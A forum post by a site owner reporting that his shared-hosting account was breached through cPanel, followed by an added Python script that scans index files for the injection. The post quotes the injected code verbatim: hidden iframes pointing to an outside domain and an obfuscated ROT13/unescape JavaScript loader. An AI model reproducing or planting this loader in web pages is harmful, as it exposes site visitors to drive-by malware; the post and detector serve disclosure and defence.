Security Forums

my web server was hacked by a user of javascrlpt.com

New Computer
Just Arrived

Joined: 06 May 2006
Posts: 0
Location: Birmingham (UK)

Posted: Tue Jan 27, 2009 12:36 pm    Post subject: my web server was hacked by a user of javascrlpt.com

basically, sunday night they came in via cpanel (presumably after hacking my master user password) via the following IPs:
94.75.221.113
62.33.71.85

They uploaded and then deleted "myfile.txt" a couple of times...

They also had a look at my webalizer stats... generated automatically with my hostgator shared hosting package...

Then they came back monday morning and replaced all of my index files from the top-level directories within the web root... with copies that contain a nasty script.

any of my index files were blank so they got nothing but the malicious content, and here's an example:

Code:
<iframe cguqw='vy6egGvf' myqxs='DvCiJn4o' src='http://javascrlpt.com/vb/in.cgi?2 ' scrtr='pzfYbvS4' uentc='Dvg1u35U' kbsxt='rAyLwf0Q' width='546' height='520' style='display:none'></iframe> <iframe cguqw='vy6egGvf' myqxs='DvCiJn4o' src='http://javascrlpt.com/vb/in.cgi?2 ' scrtr='pzfYbvS4' uentc='Dvg1u35U' kbsxt='rAyLwf0Q' width='546' height='520' style='display:none'></iframe> <SCRIPT>var KCnLhhEQ9SQBH='';var Q6F0s8d1LkW2vwVsy0go='reuav1g122rqRn2Pf2ne3%u0Qz2%/ %%gnpp%%g2b%2r s3%t.a22r2023%03pNr/%q%%223%R %2c.rS0Qt3ee%v v0gba.232%se03 nQ/ymv22u%o%2s e%3bytv%v1nQ3z z2/tv0j2u%%rPe%';var KeYJ4UImAom7='241638790556104837291026538497386974510280751326493628741509273165984012654370890461938572951742860394365810725096248731612758043915790823649036281745';var d='';for(var yC66lJ7K5IzrEt5CKJDG=0;yC66lJ7K5IzrEt5CKJDG<15;yC66lJ7K5IzrEt5CKJDG++) for(var IkYF2W3jEs=0;IkYF2W3jEs<10;IkYF2W3jEs++) {d=Q6F0s8d1LkW2vwVsy0go.charCodeAt((parseInt(KeYJ4UImAom7.charAt(yC66lJ7K5IzrEt5CKJDG*10+IkYF2W3jEs))*15)+yC66lJ7K5IzrEt5CKJDG); if ((d>=65 && d<78) || (d>=97 && d<110)) d+=13; else if ((d>=78 && d<91) || (d>=110 && d<123)) d-=13;KCnLhhEQ9SQBH+=String.fromCharCode(d);}document.write(unescape(KCnLhhEQ9SQBH));</SCRIPT>


apparently javascrlpt.com was registered only a couple of weeks ago... and has been implicated in association with trojans...

i shut down the whole domain pretty quickly via a htaccess file in the web root as follows:
Code:
order deny,allow
deny from all


before doing this though, i actually dared to load up a file to see what this script would do, and it seemed to request information from some domain or subdomain with "sextracker" in the url

...i guess it could have been a lot worse if i didn't notice a strange large index file in the parent of the web root, modified just a few minutes before when i noticed it!
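An added example, not part of the original post: a Python content check for the two markers visible in the injected index file quoted above, an off-site iframe hidden with display:none and an inline script that calls document.write(unescape(...)). The sample documents and the host names injected.example and www.mysite.example are constructed placeholders, and IndexScanner and scan_html are names chosen here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples (not from a real site), shaped like the injected file in
# the post; "injected.example" and "www.mysite.example" are placeholders.
INFECTED = ("<iframe qwe='x1' src='http://injected.example/in.cgi?2 ' "
            "width='546' height='520' style='display:none'></iframe>"
            "<SCRIPT>var s='%3Cb%3E';document.write(unescape(s));</SCRIPT>")
CLEAN = ("<html><body><iframe src='/map.html' width='300'></iframe>"
         "<script>document.title='home';</script></body></html>")
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
WRITE_UNESCAPE = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)

class IndexScanner(HTMLParser):
    """Flags hidden off-site iframes and scripts that write unescaped data."""

    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []
        self._script = None  # list of text chunks while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._script = []
        elif tag == "iframe":
            host = (urlparse(a.get("src", "").strip()).hostname or "").lower()
            hidden = (HIDDEN.search(a.get("style", "")) is not None
                      or "0" in (a.get("width"), a.get("height")))
            if hidden and host and host != self.own_host:
                self.findings.append(("hidden-offsite-iframe", host))

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            if WRITE_UNESCAPE.search("".join(self._script)):
                self.findings.append(("unescape-write-script", "inline"))
            self._script = None

def scan_html(text, own_host):
    scanner = IndexScanner(own_host)
    scanner.feed(text)
    scanner.close()  # flush any buffered trailing text
    return scanner.findings
```

Running scan_html over every index file under the web root, with own_host set to the site's own host name, lists the files that carry either marker; it does not decode or execute the script.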